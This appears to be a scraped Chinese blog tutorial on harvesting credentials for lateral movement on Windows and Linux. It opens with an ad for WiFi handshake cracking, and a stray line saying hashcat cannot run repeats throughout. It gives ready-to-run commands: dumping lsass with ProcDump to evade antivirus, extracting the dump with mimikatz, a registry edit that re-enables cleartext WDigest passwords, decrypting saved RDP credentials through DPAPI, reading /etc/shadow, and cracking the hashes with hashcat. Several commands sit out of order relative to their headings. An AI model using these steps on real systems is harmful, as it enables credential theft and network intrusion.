内网横向移动—Win Linux 内存离线读取 Hashcat破解 RDP

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

hashcat无法运行

  1. 引言
    在关于SSH密钥问题的讨论中,我本打算总结一下关于SSH密钥破解和横向移动的方法。然而,网上关于Linux系统横向移动的资料相对较少,而且很多相关知识点的总结显得有些混乱。因此,我决定先暂停对Linux横向移动的总结。不过,我还是会简单提及一下Linux横向移动,因为从系统角度来看,Linux系统中可利用的横向移动方式确实有限,通常是利用系统中安装的中间件软件等来实现横向移动。

  2. Windows系统密码提取
    在Windows Server 2012及更高版本中,为了防止明文密码泄露,微软推出了一个补丁KB2871997,关闭了wdiges功能。这意味着在内存缓存中,默认不存储明文密码。

2.1. 在线读取
在线读取实际上是使用CS自带的工具进行哈希抓取和读取,但是只能读取到哈希值,而不是明文密码。

hashcat无法运行

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

同时,可以看到密码位置全部为空,这是因为Windows Server 2012的版本问题,导致无法读取到明文密码。

2.2. 离线读取
通常情况下,使用mimikatz工具会被杀毒软件拦截,但是我们可以使用微软官方的工具来进行读取,因为这个工具是微软的官方工具,所以不会被杀毒软件拦截。

ProcDump:ProcDump – Sysinternals | Microsoft Learn

mimikatz:

2.2.1. 无存储读取
无存储读取与上述类似,即在正常读取的情况下无法获取明文密码。

2.2.1.1. 读取文件
首先需要将工具上传到Windows Server 2012上运行,然后导出运行后的文件,再利用mimikatz进行读取。

hashcat无法运行

mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonPasswords full

2.2.1.2. 本地解密
执行上述命令后,会在当前目录下出现一个名为”lsass.dmp”的文件(文件名可以自定义,但后缀必须一致)。然后我们再运行本地的文件,导入密码并进行读取,这样就避免了被杀毒软件拦截的风险。不过需要注意的是,这里仍然无法读取到明文密码,只能读取到哈希值。

hashcat无法运行hashcat无法运行

2.2.2. 有存储读取
有存储读取和无存储读取的操作类似,只是需要管理员登录过。由于我演示时使用的是Windows Server 2012作为域控制器,无法使用激活管理员登录,所以不进行演示。总的来说,操作是一样的。

reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1

hashcat无法运行hashcat无法运行

2.3. 解决高版本
前面一直提到高版本无法读取明文密码,那么该如何解决呢?实际上,可以通过修改注册表来实现,然后强制锁屏,等待管理员重新登录账号密码。

2.3.1. 修改注册表
2.3.2. 重新登录
锁屏后重新登录,然后进行密码抓取,可以看到成功获取到密码。

https://www.somd5.com/
https://www.cmd5.com/

hashcat无法运行

hashcat.exe -a 0 -m 1000 hash.txt pass.txt

2.4. HASH破解
当然,也可以对HASH密码进行破解。

2.4.1. 在线破解
在线破解可以通过一些在线网站进行,但有些网站需要付费。

2.4.2. 本地破解
本地破解需要一个庞大的密码本,有时还需要强大的CPU和GPU进行计算。hashcat是一款基于显卡的密码暴力破解工具,几乎支持所有常见的加密方式,并且支持各种密码组合。它在Kali Linux中自带,并且支持Windows和Mac平台。

这里只是简单介绍了一下用法,具体用法可以自行搜索或者以后我会写一篇专门的总结。需要注意的是,由于使用了代理,下载可能需要一些时间。

hashcat:hashcat – advanced password recovery

2.4.2.1. 字典破解
需要将哈希值复制进去,并准备好密码本,主要取决于计算机的性能来进行破解。

hashcat无法运行

-m 密文类型
-a 破解类型
?l 小写
?s 符号
?d 数字
hashcat.exe -a 3 -m 1000 579da618cfbfa85247acf1f800a280a4 ?l?l?l?l?l?s?d?d?d

2.4.2.2. 暴力破解
暴力破解可以成功,但需要超强的CPU和GPU计算能力,尤其是对于一些长且复杂的密码。下面是密码的组合方式。需要知道密码的位数、首位是大写还是小写、第二位是数字还是字母等。实际上,在实战中很难确定密码的组合方式,比如我的密码是admin@123,下面是一种理想化的写法。

hashcat无法运行hashcat无法运行

cmdkey /list

如果不允许,请删除上述测试密码记录。

2.5. RDP凭据抓取
RDP有一个保存凭据的选项,管理员通常会勾选凭据。

2.5.1. 查看连接记录
通过命令可以查看连接记录。

hashcat无法运行

dir /a %userprofile%appdatalocalmicrosoftcredentials*

hashcat无法运行

mimikatz dpapi::cred /in:C:UsersAdministratorappdatalocalmicrosoftcredentials6090C0FC3FE42D73866869883B167718

2.5.2. 查找本地的凭据
记录下这里的值。

2.5.3. 查找guidMasterKey值
需要记录目标凭据的guidMasterKey值,同时注意路径需要根据实际情况进行修改,不要直接复制粘贴,否则会出错。

hashcat无法运行

mimikatz sekurlsa::dpapi

hashcat无法运行

mimikatz dpapi::cred /in:C:UsersAdministratorappdatalocalmicrosoftcredentials6090C0FC3FE42D73866869883B167718 /masterkey:8a5b068bf179d5617421dc04bd2b310d319badf9d79421e7c0a9bf685317f23b1f7be9666983ca3af76939256c2267ba0d4ab600962e4940fcf09be61d101c1d

hashcat无法运行

chmod 755 ./mimipenguin.sh
./mimipenguin.sh

2.5.4. 记录MasterKey
需要记录guidMasterKey对应的MasterKey。

2.5.5. 解密票据
需要结合上述命令进行操作。

  1. Linux系统密码提取
    关于Linux系统的密码提取,实际上是比较少见的,而且成功率也较低。

3.1. 密码读取
这个操作并不一定成功,我在运行后一直没有反应。

mimipenguin:

hashcat无法运行

cat /etc/shadow

3.2. 密码破解
密码破解与上述Windows密码破解类似。

3.2.1. 判断密码类型
通过查看root加密方式来判断密码类型,但我无法确定我的密码y是什么加密方式。

判断加密类型:hashcat [hashcat wiki]

hashcat无法运行

linux sha512crypt $6$, SHA512 (Unix)加密方式:
hashcat -m 1800 sha512linux.txt p.txt
linux sha256crypt $5$, SHA256 (Unix)加密方式:
hashcat -m 7400 sha256linux.txt p.txt
linux下md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)加密方式:
hashcat -m 500 linuxmd5.txt p.txt
inux下bcrypt $2*$, Blowfish加密方式:
hashcat -m 3200 linuxmd5.txt p.txt

赞(0)